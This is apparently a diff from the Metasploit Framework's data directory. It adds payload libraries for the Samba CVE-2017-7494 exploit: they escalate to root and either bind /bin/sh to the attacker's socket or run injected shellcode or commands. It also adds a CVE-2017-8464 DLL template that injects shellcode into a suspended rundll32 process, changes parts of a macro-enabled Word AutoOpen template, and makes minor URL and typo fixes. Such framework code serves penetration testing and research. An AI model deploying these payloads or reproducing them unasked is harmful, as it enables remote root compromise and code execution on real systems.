+build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
+
+# S390X
+build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
+
+gzip -9 *.so
+rm -f *.o *.so

data/exploits/CVE-2017-7494/install-deps.sh

@@ -0,0 +1,21 @@
+#!/bin/bash
+
+# Assume x86_64 Ubuntu 16.04 base system
+apt-get install build-essential \
+  gcc-5-multilib \
+  gcc-5-multilib-arm-linux-gnueabi \
+  gcc-5-multilib-arm-linux-gnueabihf \
+  gcc-5-multilib-mips-linux-gnu \
+  gcc-5-multilib-mips64-linux-gnuabi64 \
+  gcc-5-multilib-mips64el-linux-gnuabi64 \
+  gcc-5-multilib-mipsel-linux-gnu \
+  gcc-5-multilib-powerpc-linux-gnu \
+  gcc-5-multilib-powerpc64-linux-gnu \
+  gcc-5-multilib-s390x-linux-gnu \
+  gcc-5-multilib-sparc64-linux-gnu \
+  gcc-4.9-powerpc64le-linux-gnu \
+  gcc-4.9-aarch64-linux-gnu
+
+if [ ! -e /usr/include/asm ];
+  then ln -sf /usr/include/asm-generic /usr/include/asm
+fi

data/exploits/CVE-2017-7494/samba-root-findsock.c

@@ -0,0 +1,67 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <signal.h>
+#include <string.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver execve,execve@GLIBC_2.0");
+__asm__(".symver dup2,dup2@GLIBC_2.0");
+__asm__(".symver getsockname,getsockname@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver execve,execve@GLIBC_2.2.5");
+__asm__(".symver dup2,dup2@GLIBC_2.2.5");
+__asm__(".symver getsockname,getsockname@GLIBC_2.2.5");
+#endif
+
+extern bool change_to_root_user(void);
+
+// Samba 4 looks for samba_init_module
+int samba_init_module(void)
+{
+  char *args[2] = {"/bin/sh", 0};
+  struct sockaddr_in sa;
+  socklen_t sl = sizeof(sa);
+  int s;
+  unsigned char buff[] = {
+    0x00, 0x00, 0x00, 0x23, 0xff, 0x53, 0x4d, 0x42,
+    0xa2, 0x39, 0x00, 0x00, 0xc0, 0x88, 0x03, 0xc8,
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+    0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x64, 0x7e,
+    0x64, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x00
+  };
+
+  change_to_root_user();
+
+  for (s=4096; s>0; s--) {
+
+    // Skip over invalid sockets
+    if (getsockname(s, (struct sockaddr *)&sa, &sl) != 0)
+      continue;
+
+    // Skip over non internet sockets
+    if (sa.sin_family != AF_INET)
+      continue;
+
+    // Send a semi-valid SMB response to simplify things
+    send(s, buff, sizeof(buff), 0);
+
+    // Duplicate standard input/output/error
+    dup2(s, 0);
+    dup2(s, 1);
+    dup2(s, 2);
+
+    execve(args[0], args, NULL);
+  }
+
+  return 0;
+}
+
+// Samba 3 looks for init_samba_module
+int init_samba_module(void) {  return samba_init_module(); }

data/exploits/CVE-2017-7494/samba-root-shellcode.c

@@ -0,0 +1,47 @@
+#include <stdio.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <signal.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver mmap,mmap@GLIBC_2.0");
+__asm__(".symver memcpy,memcpy@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver mmap,mmap@GLIBC_2.2.5");
+__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 10000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+extern bool change_to_root_user(void);
+
+// Samba 4 looks for samba_init_module
+int samba_init_module(void)
+{
+  void *mem;
+  void (*fn)();
+
+  change_to_root_user();
+  mem = mmap(NULL, PAYLOAD_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
+  if (mem == MAP_FAILED)
+    return 0;
+
+  memcpy(mem, payload, PAYLOAD_SIZE);
+  fn = (void(*)())mem;
+
+  if (! fork()) {
+    fn();
+    kill(getpid(), 9);
+  }
+  return 0;
+}
+
+// Samba 3 looks for init_samba_module
+int init_samba_module(void) {  return samba_init_module(); }

data/exploits/CVE-2017-7494/samba-root-system.c

@@ -0,0 +1,34 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 10000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+extern bool change_to_root_user(void);
+
+// Samba 4 looks for samba_init_module
+int samba_init_module(void)
+{
+  change_to_root_user();
+  if (! fork()) {
+    system((const char*)payload);
+  }
+  return 0;
+}
+
+// Samba 3 looks for init_samba_module
+int init_samba_module(void) {  return samba_init_module(); }

data/exploits/cve-2017-8464/src/build.sh

@@ -0,0 +1,16 @@
+#!/bin/sh
+rm -f *.o *.dll
+
+CCx86="i686-w64-mingw32"
+CCx64="x86_64-w64-mingw32"
+
+${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
+${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
+${CCx64}-strip -s temp.dll -o template_x64_windows.dll
+rm -f temp.dll *.o
+
+${CCx86}-gcc -c -Os template.c -Wall -shared
+${CCx86}-dllwrap --def template.def *.o -o temp.dll
+${CCx86}-strip -s temp.dll -o template_x86_windows.dll
+rm -f temp.dll *.o
+

data/exploits/cve-2017-8464/src/template.c

@@ -0,0 +1,95 @@
+// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll
+// - removed ExitThread(0) to prevent an Explorer crash
+// - added Mutex to prevent invoking payload multiple times (at least try)
+#include <windows.h>
+#include "template.h"
+
+void inline_bzero(void *p, size_t l)
+{
+	BYTE *q = (BYTE *)p;
+	size_t x = 0;
+	for (x = 0; x < l; x++)
+		*(q++) = 0x00;
+}
+
+void ExecutePayload(void);
+
+BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
+{
+	switch (dwReason)
+	{
+	case DLL_PROCESS_ATTACH:
+		ExecutePayload();
+		break;
+
+        case DLL_PROCESS_DETACH:
+		break;
+
+        case DLL_THREAD_ATTACH:
+		break;
+
+        case DLL_THREAD_DETACH:
+		break;
+	}
+
+	return TRUE;
+}
+
+void ExecutePayload(void)
+{
+	PROCESS_INFORMATION pi;
+	STARTUPINFO si;
+	CONTEXT ctx;
+	LPVOID ep;
+	HANDLE hMutex;
+	SECURITY_ATTRIBUTES MutexAttributes;
+
+	inline_bzero(&MutexAttributes, sizeof(MutexAttributes));
+	MutexAttributes.nLength = sizeof(MutexAttributes);
+	MutexAttributes.bInheritHandle = TRUE; // inherit the handle
+	hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex");
+	if(hMutex == NULL)
+	{
+		return;
+	}
+
+	if(GetLastError() == ERROR_ALREADY_EXISTS)
+	{
+		CloseHandle(hMutex);
+		return;
+	}
+
+	if(GetLastError() == ERROR_ACCESS_DENIED)
+	{
+		CloseHandle(hMutex);
+		return;
+	}
+
+	// Start up the payload in a new process
+	inline_bzero(&si, sizeof(si));
+	si.cb = sizeof(si);
+
+	// Create a suspended process, write shellcode into stack, make stack RWX, resume it
+	if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
+		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
+		GetThreadContext(pi.hThread, &ctx);
+
+		ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+		WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
+
+#ifdef _WIN64
+		ctx.Rip = (DWORD64)ep;
+#else
+		ctx.Eip = (DWORD)ep;
+#endif
+
+		SetThreadContext(pi.hThread, &ctx);
+		ResumeThread(pi.hThread);
+
+		CloseHandle(pi.hThread);
+		CloseHandle(pi.hProcess);
+	}
+
+	CloseHandle(hMutex);
+}
+

data/exploits/cve-2017-8464/src/template.def

@@ -0,0 +1,3 @@
+EXPORTS
+DllMain@12
+

data/exploits/cve-2017-8464/src/template.h

@@ -0,0 +1,3 @@
+#define SCSIZE 2048
+unsigned char code[SCSIZE] = "PAYLOAD:";
+

data/exploits/cve-2017-8464/src/template.rc

@@ -0,0 +1,18 @@
+
+LANGUAGE 9, 1
+
+
+VS_VERSION_INFO VERSIONINFO
+ FILEVERSION 0,0,0,1
+ PRODUCTVERSION 0,0,0,1
+ FILEFLAGSMASK 0x17L
+ FILEFLAGS 0x0L
+ FILEOS 0x4L
+ FILETYPE 0x2L
+ FILESUBTYPE 0x0L
+BEGIN
+
+END
+
+#define RT_HTML  23
+

data/exploits/office_word_macro/[Content_Types].xml

@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

data/exploits/office_word_macro/_rels/__rels

@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>

data/exploits/office_word_macro/core.xml

@@ -0,0 +1,13 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+  <dc:title/>
+  <dc:subject/>
+  <dc:creator/>
+  <cp:keywords/>
+  <dc:description></dc:description>
+  <cp:lastModifiedBy>Nobody</cp:lastModifiedBy>
+  <cp:revision>1</cp:revision>
+  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-25T19:12:00Z</dcterms:created>
+  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-25T19:28:00Z</dcterms:modified>
+  <cp:category/>
+</cp:coreProperties>

data/exploits/office_word_macro/docProps/app.xml

@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>105</TotalTime><Pages>1</Pages><Words>1</Words><Characters>10</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="2" baseType="variant"><vt:variant><vt:lpstr>Title</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="1" baseType="lpstr"><vt:lpstr></vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>10</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>15.0000</AppVersion></Properties>

data/exploits/office_word_macro/docProps/core.xml

@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Windows User</dc:creator><cp:keywords></cp:keywords><dc:description>                                                       PAYLOADGOESHERE</dc:description><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>32</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2017-02-01T20:39:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-02T22:26:00Z</dcterms:modified></cp:coreProperties>

data/exploits/office_word_macro/vbaData.xml

@@ -1,2 +1,2 @@
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
+<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>

data/exploits/office_word_macro/word/_rels/document.xml.rels

@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/></Relationships>

data/exploits/office_word_macro/word/document.xml

@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><w:body><w:p w:rsidR="00A31ED0" w:rsidRDefault="00366A6C"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/><w:r><w:t>DOCBODYGOESHER</w:t></w:r></w:p><w:sectPr w:rsidR="00A31ED0"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

data/exploits/office_word_macro/word/fontTable.xml

@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Calibri Light"><w:panose1 w:val="020F0302020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>

data/exploits/office_word_macro/word/settings.xml

@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="differentiateMultirowTableHeaders" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="0075759D"/><w:rsid w:val="000446F5"/><w:rsid w:val="00364989"/><w:rsid w:val="00366A6C"/><w:rsid w:val="003925D3"/><w:rsid w:val="00472204"/><w:rsid w:val="004929CB"/><w:rsid w:val="004937C6"/><w:rsid w:val="004E70C7"/><w:rsid w:val="00556042"/><w:rsid w:val="005C1470"/><w:rsid w:val="00634AFC"/><w:rsid w:val="0075759D"/><w:rsid w:val="008352C1"/><w:rsid w:val="008D18EE"/><w:rsid w:val="008F274A"/><w:rsid w:val="009337EB"/><w:rsid w:val="00965754"/><w:rsid w:val="00A31ED0"/><w:rsid w:val="00AA0D43"/><w:rsid w:val="00BD14BB"/><w:rsid w:val="00C22BA6"/><w:rsid w:val="00D4037B"/><w:rsid w:val="00DD6E1E"/><w:rsid w:val="00E636EA"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1026"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/><w15:chartTrackingRefBased/><w15:docId w15:val="{0E28A8EC-7E3E-41BD-9D1E-ADE8B995AEE4}"/></w:settings>

data/exploits/office_word_macro/word/webSettings.xml

@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:optimizeForBrowser/><w:relyOnVML/><w:allowPNG/></w:webSettings>

data/exploits/psnuffle/smb.rb

@@ -88,7 +88,7 @@ class SnifferSMB < BaseProtocolParser
         return "NTLMv1"
       end
     else
-      raise RuntimeError, "Unknow hash type"
+      raise RuntimeError, "Unknown hash type"
     end
   end
 

data/logos/3kom-superhack.txt

@@ -15,5 +15,5 @@
 |                                   %bld[ OK ]%clr                                     |
 |______________________________________________________________________________|
 |                                                                              |
-|                                                        http://metasploit.com |
+|                                                       https://metasploit.com |
 |______________________________________________________________________________|%clr

data/logos/metasploit-shield.txt

@@ -18,4 +18,4 @@
 %bluMMMMMMMMMMNm,%clr            %blueMMMMMNMMNMM%clr
 %bluMMMMNNMNMMMMMNx%clr        %bluMMMMMMNMMNMMNM%clr
 %bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
-%clr%bld        http://metasploit.com
+%clr%bld        https://metasploit.com

data/logos/missile-command.txt

@@ -27,4 +27,4 @@
 ################################################################################
 # %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
 ################################################################################
-                                                           http://metasploit.com%clr
+                                                           https://metasploit.com%clr

data/logos/ninja.txt

@@ -27,4 +27,4 @@
                      #   #   ###  #   #   ##
                      ########################
                       ##     ##   ##     ##
-                            http://metasploit.com%clr
+                            https://metasploit.com%clr

data/logos/r7-metasploit.txt

@@ -1,7 +1,7 @@
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 %%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 %%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-%%  %  %%%%%%%%   %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
+%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
 %%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 %%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

data/logos/wake-up-neo.txt

@@ -23,4 +23,4 @@
                  ; ,''-,;' ``-
                   ``-..__``--`
 
-                             http://metasploit.com%clr
+                             https://metasploit.com%clr

data/markdown_doc/auxiliary_scanner_template.erb

@@ -8,7 +8,7 @@ msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range
 msf <%= mod.type %>(<%= mod.shortname %>) > exploit
 ```
 
-Other examples of setting the RHSOTS option:
+Other examples of setting the RHOSTS option:
 
 Example 1:
 

data/msfcrawler/basic.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

data/msfcrawler/comments.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

data/msfcrawler/forms.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

data/msfcrawler/frames.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

data/msfcrawler/image.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

data/msfcrawler/link.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
